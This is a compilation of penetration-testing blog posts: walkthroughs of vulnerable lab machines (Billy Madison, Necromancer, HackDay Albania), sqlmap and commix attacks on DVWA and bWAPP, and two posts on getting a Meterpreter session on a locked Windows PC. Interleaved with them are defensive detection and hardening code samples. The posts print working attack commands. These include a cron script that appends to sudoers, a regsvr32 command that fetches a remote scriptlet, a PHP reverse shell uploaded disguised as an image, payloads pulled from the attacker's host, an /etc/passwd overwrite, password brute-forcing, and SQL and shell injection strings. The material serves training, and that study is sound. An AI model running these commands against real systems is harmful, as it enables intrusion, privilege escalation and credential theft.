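    print("knock sequence completed by:", find_knockers(LOG_SAMPLE))
```

In the sample, 192.168.0.77 hitting port 80 in the middle does not disturb the count for 192.168.0.50, and the final SYN to port 21 is the payoff the defender should correlate with the alert: a service that was closed a few seconds earlier accepting a connection from the same source.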

And voila!! FTP is open on port 21. Let's enter through it now, as we have the username and password for Eric that we discovered earlier.

ftp 192.168.0.103

Now let's see the directories in it.

dir

There is a file named .notes. I decided to read it, but before doing so I had to download it, so type:

get .notes

exit

Now that the notes file is downloaded, type the following command in the Kali terminal to read it:

cat .notes

There was a message in the notes from Eric. If you remember the conversation between Veronica and Eric, you will know that there are two users on the FTP server; the second one is veronica. Naturally, I decided to use hydra to brute-force FTP for the password, using the same dictionary file I had created with grep.

hydra -l veronica -P /root/Desktop/ver.txt ftp://192.168.0.103

And yes!! We have the username and password, i.e. veronica and babygirl_veronica07@yahoo.com respectively. Then I explored more of the FTP server with Veronica's username and password and found two files there, a .cap and a .eml, and downloaded them both. To do so, type the following combination of commands:

ftp 192.168.0.103

dir

binary

get eg-01.cap

get email-from-billy.eml

Let’s read the email now.

In the mail he says how he hacked Eric's wireless password. If you look closely you will find that he used swaks to send this mail. Swaks is a featureful, flexible, scriptable, transaction-oriented SMTP tool developed by John Jetmore. So I used the following command next:

swaks --to eric@madisonhotels.com --from vvaughn@polyfector.edu --server 192.168.0.104:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be soccer player"

Further, I used aircrack-ng on eg-01.cap, because the email sent through swaks mentioned something about a Wi-Fi password.

aircrack-ng /root/Desktop/eg-01.cap -w /usr/share/wordlists/rockyou.txt

With aircrack-ng we found the wireless password, i.e. triscuit*.

Now scan it with nmap again.

nmap -p- -A 192.168.0.103

As a result you can see that a new port has opened, 1974, with the SSH service. Let's try to log in with SSH.

ssh eric@192.168.0.103 -p 1974

Then give the password triscuit*. Once logged in, I checked the Linux version with the following command, but it was not exploitable.

lsb_release -a

Then typed following command to see what it has to offer :

ls

There I found a text file so I decided to read it.

cat why-1974.txt

Then type the following command:

find / -perm -2000 -type f 2>/dev/null

I was pretty lost here, so I took some help from Mr. g0blin (https://g0blin.co.uk/billy-madison-1-vulnhub-writeup/) and typed the following set of commands:

touch /tmp/test

/usr/local/share/sgml/donpcgd /tmp/test /etc/cron.hourly/test

echo -e '#!/bin/bash\necho "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /etc/cron.hourly/test

chmod +x /etc/cron.hourly/test

cat /etc/cron.hourly/test

This way you escalate privileges and reach root. Let's see what files root has:

ls

I decided to look in the /PRIVATE directory.

cd /PRIVATE

ls

Here I found the files hint.txt and BowelMovement. First I opened hint.txt.

cat hint.txt

In this file he talks about the BowelMovement file and about its password, which comes from the link given. So I copied the BowelMovement file.

cp BowelMovement /var/www/html

Then I created a dictionary file using cewl and that link.

cewl --depth 0 https://en.wikipedia.org/wiki/Billy_Madison > /root/Desktop/billt.txt

By brute-forcing with this dictionary file you will find the correct password. Using that password, open the BowelMovement file that you downloaded.

And then open the same in the terminal of kali and type :

ls

There is a file called secret.zip, unzip it.

unzip secret.zip

In the zipped folder there were two files. I decided to read them both.

cat THE-END.txt

cat Billy_Madison12th_Grade_Fimal_Project.doc

Finally! We have solved the CTF. Enjoy!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here.


Hack Locked PC in Network using Metasploit


Today we will discover how to get a Meterpreter session on a PC in the network which is switched on but locked.

Let us assume that our victim's PC already has the sticky keys attack enabled on it. To know more about sticky keys, visit https://en.wikipedia.org/wiki/Sticky_keys.

You will need physical access to the victim's PC for this attack. Press the "shift" key 5 times on the victim's PC to bring up the command prompt.

Next, we run Metasploit on our own PC.

$ msfconsole

Thereafter, we search for regsvr32_applocker_bypass_server, use the exploit, set the payload, lhost and lport, and run exploit.

use exploit/windows/misc/regsvr32_applocker_bypass_server

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Note the command generated by Metasploit and run it in the victim PC's command prompt.

Regsvr32 /s /n /u /i:http://192.168.0.106:8080/nKCCncmdb.sct scrobj.dll

Voila, we have the session of victim’s pc on our meterpreter.

Author: Jitesh Khanna is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here.

The post Hack Locked PC in Network using Metasploit appeared first on Hacking Articles.

Get Meterpreter Session of Locked PC Remotely (Remote Desktop Enabled)


Let's learn how to get a Meterpreter session on a PC in the network that is switched on but locked and has the Remote Desktop feature enabled.

Let us assume that the victim's PC already has the utilman or sticky keys backdoor in place. To learn more about sticky keys, visit https://en.wikipedia.org/wiki/Sticky_keys.

You do not need physical access to the victim's PC for this attack.

First, run Metasploit on your PC.

msfconsole

Then we search for regsvr32_applocker_bypass_server, use the module, set the payload, lhost and lport, and run the exploit.

use exploit/windows/misc/regsvr32_applocker_bypass_server

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Open another terminal to start a Remote Desktop session to the victim's PC, giving the victim's IP.

rdesktop 192.168.0.103

You get the remote desktop of the victim’s pc.

Press the “shift” key 5 times to bring up the command prompt.

Returning to our previous terminal with Meterpreter, we have finally got the victim PC's session on our terminal.
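Both locked-PC walkthroughs leave two host-side traces a defender can alert on: the Metasploit-generated regsvr32 command (a remote .sct fetched over HTTP and loaded through scrobj.dll) and a command prompt that winlogon.exe launches in place of the accessibility helper when Shift is pressed five times. The following is an added detection example of my own, not code from the posts; it runs both checks over constructed process-creation records, with the first record reusing the regsvr32 command shown above.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """One process-creation record (the fields Sysmon event 1 / Windows 4688 carry)."""
    parent_image: str
    image: str
    command_line: str


# regsvr32 fetching a scriptlet over HTTP(S) and loading it through scrobj.dll, the
# pattern in the Metasploit command both posts above paste into the locked PC.
REGSVR32_REMOTE_SCT = re.compile(
    r"regsvr32(?:\.exe)?\b.*?[/-]i:\s*https?://.*?\bscrobj\.dll", re.IGNORECASE)

# Shells that, when their parent is winlogon.exe, indicate an accessibility binary
# (sethc.exe for sticky keys, utilman.exe for Utility Manager) was swapped for a shell.
SHELLS = {"cmd.exe", "powershell.exe"}


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: ProcessEvent) -> list:
    """Return the findings for one event (empty when nothing is suspicious)."""
    findings = []
    if REGSVR32_REMOTE_SCT.search(event.command_line):
        findings.append("regsvr32 loading a remote scriptlet via scrobj.dll")
    if basename(event.parent_image) == "winlogon.exe" and basename(event.image) in SHELLS:
        findings.append("shell spawned by winlogon.exe (sticky keys / utilman backdoor)")
    return findings


def scan(events) -> list:
    """Return (event, findings) pairs for every event that triggered a finding."""
    hits = []
    for event in events:
        findings = classify(event)
        if findings:
            hits.append((event, findings))
    return hits


# Constructed sample events; the first reuses the command line shown in the posts.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\regsvr32.exe",
                 r"Regsvr32 /s /n /u /i:http://192.168.0.106:8080/nKCCncmdb.sct scrobj.dll"),
    ProcessEvent(r"C:\Windows\System32\winlogon.exe", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\cmd.exe"),
    # benign: a local DLL registration and a shell opened from Explorer
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32 /s C:\Program Files\Vendor\vendor.dll"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", r"cmd.exe"),
]

if __name__ == "__main__":
    for event, findings in scan(SAMPLE_EVENTS):
        print(event.image, "->", "; ".join(findings))
```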

Author: Jitesh Khanna is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here.

The post Get Meterpreter Session of Locked PC Remotely (Remote Desktop Enabled) appeared first on Hacking Articles.


SQL Injection Exploitation in DVWA (Bypass All Security)


A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

www.owasp.org/index.php/SQL_Injection

Requirements:

Xampp/Wamp Server

DVWA Lab

Kali Linux: Burp suite, sqlmap tool

First you need to install the DVWA lab on your XAMPP or WAMP server; read the full article here.

Now open DVWA on your PC and log in with the following credentials:

Username – admin

Password – password

Bypass Low Level Security

Click on DVWA Security and set the website security level to Low.

From the list of vulnerabilities select SQL Injection. Type user ID 1 in the text box. Don't click the Submit button before setting the browser proxy; set your browser proxy so that Burp Suite can intercept the request.

Turn on Burp Suite in Kali Linux, click Proxy in the menu bar and make sure Intercept is on. Go back to the browser and click Submit. The Intercept tab displays the HTTP and WebSocket messages that pass between your browser and web servers. Copy the complete intercepted request, paste it into Leafpad and save it on the Desktop as 1.

Open a terminal and type the following command to run the SQL injection attack using sqlmap.

sqlmap -r /root/Desktop/1 --dbs -D dvwa --dump-all --os-shell

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities and taking over database servers. -r makes sqlmap read the intercepted request saved at /root/Desktop/1 and analyse it.

Note that I used --dbs in the above command, which fetched all database names, as you can see in the image below. It then asks whether to store hashes in a temporary file; type y and press Enter.

Next it extracts the table users from the database dvwa, which I specified in the above command with -D dvwa.

We have dumped the users table successfully. Look at the fetched data: it contains each user's login ID, failed login count, first name, last name and password hash.

The table guestbook from the database dvwa has only 1 entry.

Now the tool will use a web backdoor for the command prompt and asks you to choose the backdoor language.

Type 4 and press Enter.

Afterwards it asks you to choose the location of a writable directory.

Type 1 and press Enter.

You can see the backdoor has been uploaded to the destination folder. Type y to retrieve the command's standard output. Now I am inside the os-shell that I requested with --os-shell in the command above.

os-shell> net users

Bypass Medium Level Security

Click on DVWA Security and set the website security level to Medium.

From the list of vulnerabilities select SQL Injection. Select user ID 2 from the list. Set the proxy, turn on Intercept in Burp Suite and come back to the web browser to submit.

Following the same process, save the intercepted request on the Desktop as file 2.

The security level is now higher, so I was unable to get an os-shell, but I successfully received all details of the database by typing the following command in the terminal.

sqlmap -r /root/Desktop/2 --dbs -D dvwa --dump-all

Again I got all database names including dvwa. Type y again to continue.

Table users from the database dvwa: it again dumped the login ID, failed login count, first name, last name and password hash.

The table guestbook from the database dvwa has only 1 entry.

Bypass High Level Security

Click on DVWA Security and set the website security level to High.

This is very similar to the Low level; however, this time the attacker supplies the value in a different manner. The input values are passed to the vulnerable query via session variables set on another page, rather than through a direct GET request.

Here you find a different scenario when you select SQL Injection; don't panic, follow the steps carefully, as this level is similar to Low security. As a hint, the developer says that the submitted user ID is redirected to another page through a POST action.

Click on the "here to change your ID" link, which opens a new window; type ID 1, turn on Intercept, then come back and click Submit.

Now compare the intercepted data of the High and Low levels: you will find that a POST action is used at High security while a GET action is used at Low security. Copy the complete data and make the following change to it (see the images below for help).

Paste the copied data into Leafpad, replace POST with GET, add /?id=1&Submit=Submit and save the file as third on the Desktop.

GET /DVWA/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1

Now go with the flow!!!

Same process as above, and this time I will again try for an os-shell.

sqlmap -r /root/Desktop/1 --dbs -D dvwa --dump-all --os-shell

Again I got all database names including dvwa. Type y again to continue.

Table users from the database dvwa: it again dumped the login ID, failed login count, first name, last name and password hash.

The table guestbook from the database dvwa has only 1 entry.

Oops!! Failed to get an os-shell, but we have retrieved the dvwa database under High security.
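What lets sqlmap dump the users table at all three levels is the shape of the query behind the user ID field. The following added example, written for this page rather than taken from DVWA, rebuilds that query three ways over a constructed in-memory SQLite table (Low: quoted concatenation; Medium: quotes escaped but the id used unquoted, as a mysql_real_escape_string-style check does; fixed: a bound parameter) and shows which inputs still return every row.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for DVWA's users table; rows are placeholders, not lab data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
                 "last_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", "admin", "<hash-1>"),
        (2, "gordonb", "brown", "<hash-2>"),
        (3, "1337", "hack", "<hash-3>"),
    ])
    return conn


def lookup_low(conn, user_id: str) -> list:
    """Low level: the id is concatenated into a quoted literal, so a quote in the
    input closes the literal and the remainder of the input is parsed as SQL."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_medium(conn, user_id: str) -> list:
    """Medium level: quotes are escaped, but the id sits unquoted in a numeric
    comparison, so an input without any quote still injects."""
    escaped = user_id.replace("'", "\\'")
    query = f"SELECT first_name, last_name FROM users WHERE user_id = {escaped}"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, user_id: str) -> list:
    """The fix at every level: the id is bound as a parameter and never parsed as SQL."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    cases = [
        ("low, normal id", lookup_low, "1"),
        ("low, tautology", lookup_low, "1' OR '1'='1"),
        ("low, union (the kind of read --dump relies on)", lookup_low,
         "1' UNION SELECT user_id, password FROM users -- "),
        ("medium, no quote needed", lookup_medium, "2 OR 1=1"),
        ("parameterized, tautology", lookup_parameterized, "1' OR '1'='1"),
        ("parameterized, no quote", lookup_parameterized, "2 OR 1=1"),
    ]
    for label, fn, payload in cases:
        print(f"{label}: {fn(db, payload)}")
```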

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media and Gadgets Lover. Contact here.

The post SQL Injection Exploitation in DVWA (Bypass All Security) appeared first on Hacking Articles.

Hack the Necromancer VM (CTF Challenge)


The Necromancer boot2root box was created for a recent SecTalks Brisbane CTF competition. There are 11 flags to collect on your way to solving the challenge. The end goal is simple…. Destroy the Necromancer!

You can download Necromancer from here; let's get going. First, we run netdiscover.

netdiscover

Our next step is nmap.

nmap -A -p- 192.168.0.110

The scan takes a bit of time and gives us nothing, so let's try a UDP scan using nmap.

nmap -sU -T4 -p- 192.168.0.110

We get UDP port 666 open. Let's try netcat on it.

nc -nvu 192.168.0.110 666

No matter how many times we hit Enter, we get the same reply: "You gasp for air! Time is running out!"

When we booted the machine (Necromancer), we saw a message regarding the IP: "Renewal in 3600 seconds". This seems to be related to the message on our terminal.

Let’s quickly run tcpdump.

tcpdump host 192.168.0.110

We get to know about port 4444. This could be another port on our target. Let's use netcat once again.

nc -nvlp 4444

And we get a text dump in return. It has upper-case characters, lower-case characters and numbers as well. This has to be base64-encoded text. We decode it at www.asciitohex.com and get some sensible text.

OK. We have our 1st flag, and a message to chant the flag's string at UDP port 666. The flag1 text seems to be an MD5 hash, so we look it up at www.hashkiller.co.uk. It resolves to "opensesame". Let's return to port 666 using netcat and type this string there.

nc -nvu 192.168.0.110 666

opensesame

Another hint. The number 80 reminds us of port 80, used for HTTP. Let's open the victim machine's IP in our browser on port 80.

Nothing useful except an image. Let's download it and analyse it using binwalk.

binwalk /root/Desktop/pileoffeathers.jpg

So we discover that the image is actually a zip archive. Let’s rename it.

mv /root/Desktop/pileoffeathers.jpg /root/Desktop/pileoffeathers.zip

Upon unzipping the file we get a text file named feathers.txt, which again contains base64 text. We decode it and get our 3rd flag along with a clue: /amagicbridgeappearsatthechasm. Seems like a directory.

Opening the directory in our browser, we are greeted by another web page with seriously no clues this time. It only tells us that we need a magical item that could protect us from the Necromancer's spell. We google "magic items wiki" and find some good stuff at the very first link. But what next?

We decide to make a custom dictionary from all the words on this wiki page. We will use cewl for this.

cewl https://en.wikipedia.org/wiki/List_of_mythological_objects -d 0 -w /root/Desktop/magicItems.txt -v

This makes a dictionary of magical items on our Desktop. Let us try dirb to get our next clue.

dirb http://192.168.0.110/amagicbridgeappearsatthechasm /root/Desktop/magicItems.txt

We get another directory as the result: talisman.

When we visit the URL with talisman appended, we are asked to download a binary file named talisman.

We download the file and change the permissions of talisman by running

chmod 777 /root/Desktop/talisman

Thereafter we run the file from its location.

./talisman

No matter what we answer to the question "Do you want to wear the talisman?", the result is the same: "Nothing happens". So let's try to debug the binary.

gdb /root/Desktop/talisman

Get some info about the functions:

info functions

Create a breakpoint at wearTalisman, because after all we want to wear the talisman.

break wearTalisman

run

And then jump to chantToBreakSpell:

jump chantToBreakSpell

Yes! We succeeded in wearing the talisman. We get our 4th flag and a hint to chant the flag's words at UDP port 31337.

The words appear to be an MD5 hash, and looking it up gives "blackmagic". We now use netcat to connect to port 31337 and type "blackmagic" there.

nc -unv 192.168.0.110 31337

blackmagic

And we get another directory along with our 5th flag.

We open the directory under our victim's IP.

Another web page with a hint to look at UDP port 161 (used for SNMP), and a close look reveals that the word "necromancer" just before the image is actually a link. Clicking it gives us another file to download, named "necromancer". We download and unzip it. It contains a cap file named necromancer. Analysing this file with Wireshark, we discover that the 802.11 protocol is in use, which means the file is a wireless capture, so let's try to crack the key using aircrack-ng with rockyou.txt as our dictionary.

aircrack-ng /root/Desktop/necromancer.cap -w /usr/share/wordlists/rockyou.txt

This cracks the key as death2all. Use it as the community string on port 161, i.e. SNMP.

snmpwalk -c death2all -v 1 192.168.0.110

It says that the door is locked.

Let’s try to unlock it using snmpset.

snmpset -c death2allrw -v 1 192.168.0.110 iso.3.6.1.2.1.1.6.0 s Unlocked

When the string changes to "Unlocked", we run our previous command once again.

snmpwalk -c death2all -v 1 192.168.0.110

Voila!! The door unlocks and we get another flag along with a clue, i.e. TCP port 22 (used for SSH): flag7{9e5494108d10bbd5f9e7ae52239546c4} – t22. Another MD5 hash, which resolves to "demonslayer".

We try to log in on port 22 assuming "demonslayer" to be the password, but fail.

ssh 192.168.0.110

demonslayer

This means that "demonslayer" should be the username for SSH. To crack the password, we will use Metasploit along with the rockyou.txt dictionary. Open a terminal for Metasploit.

search ssh_login

Thereafter we run the following commands:

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.0.110

set username demonslayer

set pass_file /usr/share/wordlists/rockyou.txt

run

We get the password as 12345678 and a shell as well.

But neither ls nor dir seems to work in this shell.

So we log in via SSH from a terminal on the host using demonslayer/12345678.

ssh demonslayer@192.168.0.110

12345678

Using ls -la we discover a flag8.txt file in the directory. To read its contents we use:

cat flag8.txt

We get another hint regarding UDP port 777. This does not work from our PC, so let us try it in the victim's shell.

nc -u localhost 777

and hit Enter twice.

So the Necromancer is now trying to play a game with us. Googling his question "Where do the Black Robes practice magic of the Greater Path?" gives us the answer: Kelewan.

Our 8th flag is here: flag8{55a6af2ca3fee9f2fef81d20743bda2c}, and another question as well: "Who did Johann Faust VIII make a deal with?" Google tells us the answer to this question is Mephistopheles.

flag9{713587e17e796209d1df4c9c2c2d2966}

And we get the next flag and yet another question: "Who is tricked into passing the Ninth Gate?" Google comes in handy again and tells us the answer once more: Hedge.

And our next flag awaits us: flag10{8dc6486d2c63cafcdc6efbba2be98ee4}. Nothing more to be noticed here, but if I am not wrong, we did see this "small vile" thing somewhere earlier. Let's head back with Ctrl+C and look for it.

We type ls -la and yes, it's there: ".smallvile", which we just learned about in the description along with our 10th flag. Let's open it using cat.

cat .smallvile

Hope this opened up some gates, because we don't see any clue here. Let's try sudo.

sudo -l

It works. It shows us the location of our 11th flag and that reading flag11.txt does not require a password. Let's try to open it.

sudo /bin/cat /root/flag11.txt

Wohoo!! Mission Accomplished. The last flag has been captured.

Researcher and Author: Jitesh Khanna is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here.

The post Hack the Necromancer VM (CTF Challenge) appeared first on Hacking Articles.

Powershell Injection Attacks using Commix and Magic Unicorn


Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:

https://www.owasp.org/index.php/Command_Injection

Requirements:

Xampp/Wamp Server

bWAPP Lab

Kali Linux: Burp suite, Commix tool

You need to install the bWAPP lab on your XAMPP or WAMP server; for this you can visit the web pentest lab setup using bWAPP article here.

Our task is to get a Meterpreter shell through the OS Command Injection - Blind vulnerability in bWAPP.

Start the Apache and MySQL services in XAMPP or WAMP. Open the local host address in the browser; I am using 192.168.1.103:81/bWAPP/login.php. Enter the username and password bee and bug respectively.

My task is to bypass all three security levels in bWAPP through OS command injection.

Let's start!!!!

Set the security level to low, from the list box choose the bug OS Command Injection - Blind and click on Hack.

Type your IP in the text field and right after that start Burp Suite in Kali Linux. Don't forget to set the proxy in your browser while using Burp Suite.

To capture the bWAPP cookie, click on the Proxy tab, make sure Intercept is on, come back to bWAPP and click the PING button.

Look at the image: you will find that I have got the details.

Open the terminal in Kali Linux and type the commix command.

From the intercepted data in Burp Suite copy the referrer, cookie and target and use them in the following command:

commix --url="http://192.168.1.101:81/bWAPP/commandi_blind.php" --data="target=192.168.1.101&form=submit" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=5m82jlcacsvb2rfmn73gt3egi2"

This command runs the commix tool in the terminal, which automatically performs the command injection attack using the URL and cookie information from bWAPP.

Commix finds that the target seems injectable via blind injection techniques and then asks whether to open a pseudo-terminal.

Type 'y' to resume the classic injection point and get a pseudo-terminal shell.

Here we have the commix OS shell, but our aim is a Meterpreter shell; for that we type the following commands.

commix(os_shell) > reverse_tcp

commix(reverse_tcp) > set LHOST 192.168.1.101

commix(reverse_tcp) > set LPORT 4444

Commix asks which backdoor to use for the connection. Type '2' for other reverse TCP shells.

commix(reverse_tcp) > 2

Commix asks which payload to use. Type '7' to use a Windows Meterpreter reverse TCP shell.

commix(reverse_tcp) > 7

Commix asks which PowerShell injection attack to use. Type '2' to use TrustedSec's Magic Unicorn.

commix(reverse_tcp) > 2

The above step generates the payload and the handler command marked in the image. Copy the whole command "msfconsole -r /usr/share/commix/src/thirdparty/unicorn/unicorn.rc" and paste it in a new terminal, which will start the multi/handler on its own.

Once the Metasploit framework is loaded and the payload handler has started, come back to your previous terminal and press Enter, as shown in the image.

Luckily!! We succeeded in our task: we have got a Meterpreter shell.

meterpreter > sysinfo

We are going to perform the same task with the same process but with another variant of the vulnerability. Set the security level to low, from the list box choose the bug OS Command Injection and click on Hack.

Type your IP in the DNS lookup field and right after that start Burp Suite and set the browser's manual proxy. Click on the Proxy tab, make sure Intercept is on, come back to bWAPP and click Lookup.

Open the terminal in kali Linux and type the commix command.

commix --url="http://192.168.1.101:81/bWAPP/commandi.php" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=1; PHPSESSID=79egt1piglgkadfnaa6dujass7" --data="target=192.168.1.101&form=submit"

Type 'y' to resume the classic injection point and get a pseudo-terminal shell.

Here we have the commix OS shell, but our aim is a Meterpreter shell; for that we type the following commands.

commix(os_shell) > reverse_tcp

commix(reverse_tcp) > set LHOST 192.168.1.101

commix(reverse_tcp) > set LPORT 4444

Commix asks which backdoor to use for the connection. Type '2' for other reverse TCP shells.

commix(reverse_tcp) > 2

Commix asks which payload to use. Type '7' to use a Windows Meterpreter reverse TCP shell.

commix(reverse_tcp) > 7

Commix asks which PowerShell injection attack to use. Type '2' to use TrustedSec's Magic Unicorn.

commix(reverse_tcp) > 2

The above step generates the payload and the handler command marked in the image. Copy the whole command "msfconsole -r /usr/share/commix/src/thirdparty/unicorn/unicorn.rc" and paste it in a new terminal, which will start the multi/handler on its own.

Once the Metasploit framework is loaded and the payload handler has started, come back to your previous terminal and press Enter, as shown in the image.

Luckily!! Again we succeeded in our task: we have got a Meterpreter shell.

meterpreter > sysinfo
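Both bWAPP pages above break because the value typed into the target field is spliced into the string handed to the system shell. The following is an added example of my own, not bWAPP's PHP or commix code: it shows that string beside a hardened handler that validates the target as an IP address or hostname and runs ping as an argv list with no shell, so a value like 192.168.1.101; id is rejected instead of executed.

```python
import ipaddress
import re
import subprocess

# Metacharacters a shell would interpret; their presence in a "target" value is worth
# logging as an injection attempt even after the request has been rejected.
SHELL_META = re.compile(r"[;&|`$()<>\n\r]")

# Hostname labels per RFC 1123: letters, digits and inner hyphens only, 253 chars overall.
# \Z (not $) so a trailing newline cannot slip through.
HOSTNAME = re.compile(
    r"^(?=.{1,253}\Z)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*\Z", re.IGNORECASE)


def vulnerable_command(target: str) -> str:
    """The shape of bWAPP's blind ping page: the form value is spliced into a shell
    string, so anything after ';' or '&&' in target runs as a second command."""
    return f"ping -c 1 {target}"


def looks_injected(target: str) -> bool:
    """True when the value contains shell metacharacters (for alerting, not for filtering)."""
    return SHELL_META.search(target) is not None


def validate_target(target: str) -> str:
    """Accept only a literal IP address or an RFC 1123 hostname; raise on anything else.
    The hostname rule also rejects a leading '-', so the value cannot become a ping option."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        pass
    if HOSTNAME.match(target):
        return target
    raise ValueError("target must be an IP address or hostname")


def is_accepted(target: str) -> bool:
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def hardened_command(target: str) -> list:
    """argv form: no shell is involved and the validated target is exactly one argument."""
    return ["ping", "-c", "1", validate_target(target)]


def run_ping(target: str) -> str:
    """Run the hardened command with shell=False and a timeout; returns ping's stdout."""
    result = subprocess.run(hardened_command(target), capture_output=True, text=True,
                            timeout=10, check=False)
    return result.stdout


if __name__ == "__main__":
    for value in ["192.168.1.101", "example.com", "192.168.1.101; id",
                  "127.0.0.1 && whoami", "-c 1000 127.0.0.1"]:
        if is_accepted(value):
            print(repr(value), "->", hardened_command(value))
        else:
            print(repr(value), "-> rejected; the unsafe version would have run:",
                  repr(vulnerable_command(value)))
```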

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media and Gadgets Lover. Contact here.

The post Powershell Injection Attacks using Commix and Magic Unicorn appeared first on Hacking Articles.

Hack the Hackday Albania VM (CTF Challenge)


This was used in HackDay Albania’s 2016 CTF. It uses DHCP.

Note: VMware users may have issues with the network interface going down by default. You are recommended to use VirtualBox.

Download the lab from: https://www.vulnhub.com/entry/hackday-albania,167/

Let's begin. First we run netdiscover (as usual).

netdiscover

Next we run nmap.

nmap -p- -A 192.168.0.103

The nmap result shows that our target is running HTTP on port 8008. So we open our browser at http://192.168.0.103:8008

The message in the box translates to "if I am, I know where to go :)"

We look for a hint in the page source and find a comment at the bottom: "Ok ok, but not here :)". Next we run nikto on our target.

nikto -h 192.168.0.103:8008

Upon discovering the existence of robots.txt, we open it in our browser.

http://192.168.0.103:8008/robots.txt

All but one of the directories give us the same result.

The directory that proves to be worth visiting is http://192.168.0.103:8008/unisxcudkqjydw/

So we discover another useful directory. Let's head to it.

http://192.168.0.103:8008/unisxcudkqjydw/vulnbank/

Clicking on the client/ directory, we are greeted by the login page of a "very secure bank".

Trying a single ' as the username gives us an error page.

After trying multiple credentials, we finally succeed in logging in as the first user with

' or 'a' = 'a' --

#

On the welcome page we find an option to upload a file. Let us create a PHP payload using msfvenom and try uploading it.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw

We copy the PHP code into Leafpad and save it under the name ra.php. We try to upload the file, but the web page displays an error: "After we got hacked we are allowing only image files to upload such as jpg, jpeg, bmp etc..." Let's rename our file to ra.jpg and try uploading it again.

Start the msf handler.

msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Now we click on the view ticket option under ra.jpg in our browser.

And we have our Meterpreter session. To get a proper shell, move to the tmp folder and find the OS release, we run the following commands:

shell

python3 -c 'import pty; pty.spawn("/bin/bash");'

cd /tmp

lsb_release -a

Kernel exploits do not seem to work here since gcc is not installed on our target machine. So we decide to go the other way. In another terminal we download the LinEnum.sh script from GitHub using:

git clone https://github.com/rebootuser/LinEnum.git

Thereafter we start the Apache service on our machine.

service apache2 start

Thereafter we copy the LinEnum.sh file to the /var/www/html folder of our machine and, returning to our victim's shell, fetch the file into its tmp folder.

wget http://192.168.0.106/LinEnum.sh

Thereafter, change the permissions of the downloaded file and run it.

chmod 777 LinEnum.sh

./LinEnum.sh

We discover that /etc/passwd is writable.

And the password hashing used by our victim's machine is SHA-512.

We open the victim's passwd file in the terminal itself.

cat /etc/passwd

We then copy the entire contents of the file into Leafpad and save it as passwd. To know more about /etc/passwd, please visit https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/ or https://www.digitalocean.com/community/tutorials/how-to-use-passwd-and-adduser-to-manage-passwords-on-a-linux-vps

Thereafter, in another terminal, we generate a SHA-512 crypt hash for the password "raj".

python -c 'import crypt; print(crypt.crypt("raj", "$6$saltsalt$"))'

We now copy this hash and put it in place of the 'x' in the last line of our passwd file, which we just saved in Leafpad.

Next, we place this file named passwd in the /var/www/html folder of our machine and fetch it into the victim's tmp folder.

wget http://192.168.0.106/passwd

Now copy this file over the passwd file present inside the /etc folder.

cp passwd /etc/passwd

Then we try logging in as the user taviso.

su taviso

raj

Next we try the root login.

sudo -i

raj

Success. Now list the contents.

ls

